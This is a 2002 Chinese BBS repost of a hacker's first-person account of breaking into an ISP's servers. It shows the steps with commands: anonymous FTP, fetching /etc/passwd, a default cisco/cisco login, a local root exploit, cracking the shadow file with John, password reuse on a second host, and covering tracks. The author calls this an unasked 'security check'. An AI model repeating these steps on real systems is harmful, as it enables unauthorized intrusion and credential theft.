荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: shenjunjun (Shenjunjun), 信区: Security
标  题: 一个黑客网站的过程
发信站: 荔园晨风BBS站 (Mon Mar 18 20:04:44 2002), 转信

对一台国内著名ISP黑客的过程 ~ ~


------------------------------------------------------------------------
--------

 saki 于 2002-3-7 15:21:40 加贴在 绿盟科技论坛(bbs.nsfocus.com)--CGI安全


/********************************************************************
*欢迎转载,转载请著名作者出处
*
*中国维安网 http://www.efocuscn.com
*
*unix 斑竹:saki
*win  斑竹: 核金融
*CGI  斑竹: 代聘中(你可以来申请!热烈欢迎!  ~~¥~~)
*灌水 斑竹:command
*
*维安网邮件联系地址:webmaster@efocuscn.com

*
*欢迎大家踊跃发贴:
*http://www.efocuscn.com/bbs
********************************************************************/

实际上没有什么,只是看到咱们的BBS太过于冷清,发篇文章鼓舞一下人气。
有什么办法呢?这些斑竹都懒的出奇,竟然一个星期才进来看一下,令人绝倒。。
。。。

目的:
验证某著名ISP的主机安全

时间:
2001-10-某日

地点:
办公室电脑上

目标:
一个国内著名的ISP的区域主机

人物:
区区在下一人:saki

顺便说一句,中国的安全实在是差,配置的错误,也挺可怕。

过程:
对www.xxxx.com 主机先进行初始扫描,通常不会有太多有用的信息,手动的探测
才是实在的用处。
BTW:没有用上肉鸡,实在是并没有打算太快,太简单就搞定这台主机,毕竟这是
国内有名的XXX公司啊。。。呵呵

1、端口开放正常,并没有太多的多余端口打开;

21
23

80

2、查看主机的系统版本,很简单,只是:
telnet www.xxx.com

。。。。。

SUN OS 5.7

......

3、针对80端口进行了重点扫描,主要是想找到些远程的CGI漏洞,
扫描后,失败,CGI清空了,没有任何有利用价值的CGI漏洞。

4、查看FTP端口:
ftp www.xxx.com

。。。。。。。。
WELCOME XXX.COM   .....WUFU-FTP2。4。16。。。。

.....
user: ftp
passwd:(xxx@2.com)
.....
user loged in.

ftp>
呵呵,能够匿名登入啊,WUFU-FTP2。4。16的版本有远程漏洞,不过需要可写权限
的。先查看一下子。

ftp> ls

user
tmp
welcome
bin

200 PORT Command successful.

ftp> cd tmp

200 PORT Command successful.

ftp>put c:\test.txt

xxxxxx....

200 PORT Command successful.

ftp>by

这烂站,tmp目录有可写权限,OK,LET‘S ROCK!

5、登陆到一个SUN OS 肉鸡上,编译了一个从自己的漏洞程序库中wufu-ftp2.4.
16的漏洞程序,并远程运行程序。

#./wuftp www.xxx.com /tmp ftp/ftp@2.com -p 120

connect.....
send shell....
wait for you shell....

..........

error.

#
没有反应,程序退出,没有出现SHELL。又试了几次,加大堆栈值,依旧没有成功

估计主机已打了补丁,这条线断了。

6、难道这个站点就进不去吗?根据经验,一定会有哪里有些小的疏忽,只是还没
有发现。let me think........

ZZZ#@#$#@~~~~ZZzzzzzZZ

到中午了,吃过了饭,睡一觉再说。

7、下午了,先去SINA去看了会新闻。

8、继续查看FTP服务,看有没有疏忽的。
ftp> ls

user
cisco
tmp
welcome
bin

200 PORT Command successful.

ftp > get /etc/passwd

xxxxx...

200 PORT Command successful.

(这里大家可能要问:没有出现etc目录,你瞎抓个什么劲啊?各位观众,这个是经
验,虽然没有显示etc目录,但你一定能够抓个passwd口令文件下来。)

查看/etc/passwd文件内容:

root:x:::::
ftp:::::
cisco:::::

9、直觉:cisco用户有问题,cisco设备老用些同样密码,这样的例子还少吗?如
果这台cisco是老设备的话。。。。

10、
telnet www.xxx.com
......
login:cisco
password:(空)

error.

login:cisco
password:cisco

user log in.
.............

cisco>

呵呵,成功。

11、找到SUN OS 5。7的本地溢出漏洞,编译、运行后成功获得ROOT 权限。

12、为了扩大战果,查看管理员xxshirt的.sh_history文件,看到一条:
telnet 211.xx.xx.xx
的指令。

对211.xx.xx.xx 主机扫描后,发现是LINUX主机,而且没有任何漏洞可以利用,只
开了21,21,80端口。

13、开动脑筋,开动脑筋,真正的HACKER是技术,更是头脑!!!
拿下www.xx.com 的shadow文件,拿到主机上,开 JOHN 开跑口令。

2分钟后找到xxshirt的口令:money02

14、一般的管理员会有在个服务器上用同一密码的习惯(恶习)!
telnet 211.xx.xx.xx
login:xxshirt
password:money02

error.

15、口令不对!恩。。。。let me think,这家伙还防了一手。根据密码心里学,
(呵呵。。是不是太玄了点。)即便密码不是同一密码,相似的可能性是很大的,
于是尝试:

telnet 211.xx.xx.xx
login:xxshirt
password:money

。。。。。

user log in.

$

16、成功突破,扩大了战果,得到了另一linux主机。


17、打扫卫生后,离开。

18、发封EMAIL告诉网管他们的BUG,并提出中肯的安全建议。(呵呵,这个时候心
里非常自豪~~)

saki 留白如下:

####################################################################
此次的攻击实际上根本原因是由于配置的基本错误引起的,因为这两台主机很重要
,没有动任何文件,没有查看资料,安全退出。

真正的HACKER是不会破坏,要的只是挑战!

同时,多思考,开动脑筋也是同样重要!

--
※ 修改:·jjksam 於 Mar 18 23:24:12 修改本文·[FROM: 192.168.0.146]
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 166.111.51.16]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店